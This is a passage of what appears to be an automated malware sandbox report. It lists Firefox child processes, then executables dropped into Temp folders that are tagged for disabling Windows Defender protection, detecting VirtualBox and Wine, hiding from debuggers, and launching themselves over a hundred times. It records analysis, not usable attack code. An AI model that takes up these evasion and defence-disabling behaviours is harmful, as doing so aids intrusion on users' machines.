        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e65da9c9-3d6f-45c8-beab-937de4663737} 5168 "\\.\pipe\gecko-crash-server-pipe.5168" gpu
        6⤵
        
        PID:6104
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95a3c165-5d46-48e3-a258-334e5775e810} 5168 "\\.\pipe\gecko-crash-server-pipe.5168" socket
        6⤵
        
        PID:5596
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3060 -childID 1 -isForBrowser -prefsHandle 1580 -prefMapHandle 1460 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79702d90-db6c-4299-93f8-ae197d75a0e0} 5168 "\\.\pipe\gecko-crash-server-pipe.5168" tab
        6⤵
        
        PID:5204
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4144 -childID 2 -isForBrowser -prefsHandle 4136 -prefMapHandle 4132 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85439bee-cca8-4ea6-984d-bdafd14bbc76} 5168 "\\.\pipe\gecko-crash-server-pipe.5168" tab
        6⤵
        
        PID:5240
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4724 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4760 -prefMapHandle 4796 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9943dd7-a940-4735-8dcf-e84e02bbfbb8} 5168 "\\.\pipe\gecko-crash-server-pipe.5168" utility
        6⤵
        Checks processor information in registry
        
        PID:6464
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5304 -childID 3 -isForBrowser -prefsHandle 4124 -prefMapHandle 5180 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53b0302d-6987-4dc5-b77c-e350b7693657} 5168 "\\.\pipe\gecko-crash-server-pipe.5168" tab
        6⤵
        
        PID:7044
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5524 -childID 4 -isForBrowser -prefsHandle 5516 -prefMapHandle 5444 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {add70237-5014-418d-866b-991f852cab54} 5168 "\\.\pipe\gecko-crash-server-pipe.5168" tab
        6⤵
        
        PID:7056
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5668 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {103a03f4-012a-4068-9319-782540468f91} 5168 "\\.\pipe\gecko-crash-server-pipe.5168" tab
        6⤵
        
        PID:7068
- - C:\Users\Admin\AppData\Local\Temp\1016273001\194101cee1.exe
    "C:\Users\Admin\AppData\Local\Temp\1016273001\194101cee1.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:6396
- - C:\Users\Admin\AppData\Local\Temp\1016274001\98fc6973d9.exe
    "C:\Users\Admin\AppData\Local\Temp\1016274001\98fc6973d9.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:6300
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 536
      4⤵
      Program crash
      PID:5888
- - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
    "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1288
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:6744
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5952
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:6948
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5920
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:4892
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5640
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5644
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5656
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5652
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5976
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5764
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:3320
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5768
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5516
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:6548
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:7148
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:704
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:7144
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:7128
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5256
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:5732
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:2300
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:1772
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:6984
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:7124
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:7116
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:3512
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:6980
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:1652
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      Executes dropped EXE
      PID:1160
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6976
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7160
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4748
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6196
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6360
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7040
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6528
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2060
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1664
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4980
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4960
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6540
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6796
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6780
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6792
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5336
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6872
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6868
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4460
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6888
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6764
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6716
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5396
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1236
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6956
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6552
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4816
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6024
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5492
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5340
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2828
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4676
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6900
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6924
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6520
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2092
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6500
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6272
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7012
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2240
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4720
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:928
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6300
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6364
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5932
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:3020
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:3220
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5948
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:3992
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:384
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6732
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5296
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:3776
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:3968
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6752
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5288
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5292
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7172
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7180
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7188
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7196
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7204
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7212
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7220
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7228
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7236
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7244
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7252
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7260
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7268
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7284
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7292
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7300
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7308
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7316
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7324
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7332
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7340
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7348
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7356
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7364
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7372
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7380
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7388
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7396
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7404
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7412
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7420
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7428
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7436
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7444
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:7452
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
